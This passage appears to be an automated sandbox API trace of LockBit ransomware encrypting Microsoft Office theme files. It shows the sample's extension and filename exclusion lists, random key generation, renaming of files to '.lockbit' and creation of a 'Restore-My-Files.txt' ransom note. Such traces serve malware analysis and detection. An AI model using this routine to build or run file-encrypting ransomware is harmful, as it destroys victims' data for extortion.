lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="ntldr", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="bootsect.bak", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="autorun.inf", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="thumbs.db", lpString2="Aspect.thmx") returned 1 [0185.838] lstrcmpiW (lpString1="iconcache.db", lpString2="Aspect.thmx") returned 1 [0185.838] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.838] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx") returned=".thmx" [0185.838] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.838] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.838] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.839] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.839] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.lockbit") returned 73 [0185.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\aspect.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0185.847] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.847] malloc (_Size=0x40068) returned 0x3d70450 [0185.847] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=68069) returned 1 [0185.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0185.848] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.848] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.848] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0185.848] ReadFile (in: hFile=0x330, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0185.852] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.852] malloc (_Size=0xa8) returned 0x1fa2ed8 [0185.852] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0185.853] free (_Block=0x1fa2ed8) [0185.854] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Aspect.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.854] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.854] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4067b900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe598f420, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4067b900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1763b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Austin.thmx", cAlternateFileName="AUSTIN~1.THM")) returned 1 [0185.854] lstrcmpiW (lpString1=".", lpString2="Austin.thmx") returned -1 [0185.854] lstrcmpiW (lpString1="..", lpString2="Austin.thmx") returned -1 [0185.854] PathFindExtensionW (pszPath="Austin.thmx") returned=".thmx" [0185.854] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.854] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.855] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.855] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.856] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="ntldr", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="bootsect.bak", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="autorun.inf", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="thumbs.db", lpString2="Austin.thmx") returned 1 [0185.856] lstrcmpiW (lpString1="iconcache.db", lpString2="Austin.thmx") returned 1 [0185.856] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.856] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx") returned=".thmx" [0185.856] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.857] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.857] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.858] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.858] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.858] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.858] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.858] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.lockbit") returned 73 [0185.858] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0185.870] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.870] malloc (_Size=0x40068) returned 0x3f70048 [0185.870] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=95803) returned 1 [0185.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.870] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.870] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0185.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0185.871] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0185.874] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.874] malloc (_Size=0xa8) returned 0x1fa2ed8 [0185.874] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0185.875] free (_Block=0x1fa2ed8) [0185.875] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.875] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.875] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.876] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x668d5900, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59b5580, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x668d5900, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x9ff03, dwReserved0=0x0, dwReserved1=0x0, cFileName="Black Tie.thmx", cAlternateFileName="BLACKT~1.THM")) returned 1 [0185.876] lstrcmpiW (lpString1=".", lpString2="Black Tie.thmx") returned -1 [0185.876] lstrcmpiW (lpString1="..", lpString2="Black Tie.thmx") returned -1 [0185.876] PathFindExtensionW (pszPath="Black Tie.thmx") returned=".thmx" [0185.876] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0185.876] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0185.877] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0185.877] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Black Tie.thmx") returned 1 [0185.878] lstrcmpiW (lpString1="ntldr", lpString2="Black Tie.thmx") returned 1 [0185.878] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Black Tie.thmx") returned 1 [0185.878] lstrcmpiW (lpString1="bootsect.bak", lpString2="Black Tie.thmx") returned 1 [0185.878] lstrcmpiW (lpString1="autorun.inf", lpString2="Black Tie.thmx") returned -1 [0185.878] lstrcmpiW (lpString1="thumbs.db", lpString2="Black Tie.thmx") returned 1 [0185.878] lstrcmpiW (lpString1="iconcache.db", lpString2="Black Tie.thmx") returned 1 [0185.878] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0185.878] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx") returned=".thmx" [0185.878] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0185.878] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0185.878] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0185.879] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0185.880] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0185.880] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx.lockbit") returned 76 [0185.880] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\black tie.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0185.887] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0185.887] malloc (_Size=0x40068) returned 0x3df0008 [0185.887] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=655107) returned 1 [0185.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0185.888] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0185.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0185.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0185.888] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0185.892] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.892] malloc (_Size=0xae) returned 0x1fa2ed8 [0185.892] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0185.893] free (_Block=0x1fa2ed8) [0185.893] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Black Tie.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0185.893] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0185.893] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0185.893] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ccef00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe59b5580, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4ccef00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x18c11, 